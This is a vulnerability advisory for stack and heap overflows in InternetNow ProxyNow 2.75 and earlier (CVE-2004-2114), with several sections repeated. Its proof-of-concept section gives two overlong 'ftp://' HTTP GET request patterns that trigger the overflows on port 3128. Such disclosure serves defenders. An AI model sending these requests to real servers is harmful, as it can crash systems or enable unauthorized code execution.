InternetNow ProxyNow Multiple Stack and Heap Overflow Vulnerabilities
BID:9500
Info
InternetNow ProxyNow Multiple Stack and Heap Overflow Vulnerabilities
| Bugtraq ID: | 9500 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2004-2114 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 26 2004 12:00AM |
| Updated: | Jul 12 2009 02:06AM |
| Credit: | The disclosure of these issues has been credited to Peter Winter-Smith <[email protected]>. |
| Vulnerable: |
InternetNow ProxyNow 2.75 InternetNow ProxyNow 2.6 |
| Not Vulnerable: | |
Discussion
InternetNow ProxyNow Multiple Stack and Heap Overflow Vulnerabilities
ProxyNow has been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities present themselves when an attacker sends a HTTP GET request containing an excessively long URI to the server on TCP port 3128. The URI must be prefixed with the string 'ftp://'.
ProxyNow versions 2.75 and prior have been reported to be prone to these issues.
ProxyNow has been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities present themselves when an attacker sends a HTTP GET request containing an excessively long URI to the server on TCP port 3128. The URI must be prefixed with the string 'ftp://'.
ProxyNow versions 2.75 and prior have been reported to be prone to these issues.
Exploit / POC
InternetNow ProxyNow Multiple Stack and Heap Overflow Vulnerabilities
The following proof of concept has been provided:
GET ftp://('a'x647)('AAAA')('XXXX') HTTP/1.1
GET ('ftp://www.example.com/')('a'x249)('BBBB')('XXXX') HTTP/1.1
The following exploit has been provided for the stack based buffer overflow issue:
The following proof of concept has been provided:
GET ftp://('a'x647)('AAAA')('XXXX') HTTP/1.1
GET ('ftp://www.example.com/')('a'x249)('BBBB')('XXXX') HTTP/1.1
The following exploit has been provided for the stack based buffer overflow issue:
Solution / Fix
InternetNow ProxyNow Multiple Stack and Heap Overflow Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
InternetNow ProxyNow Multiple Stack and Heap Overflow Vulnerabilities
References:
References:
- ProxyNow Product Page (InternetNow)
- ProxyNow! 2.x Multiple Overflow Vulnerabilities ("Peter Winter-Smith"
)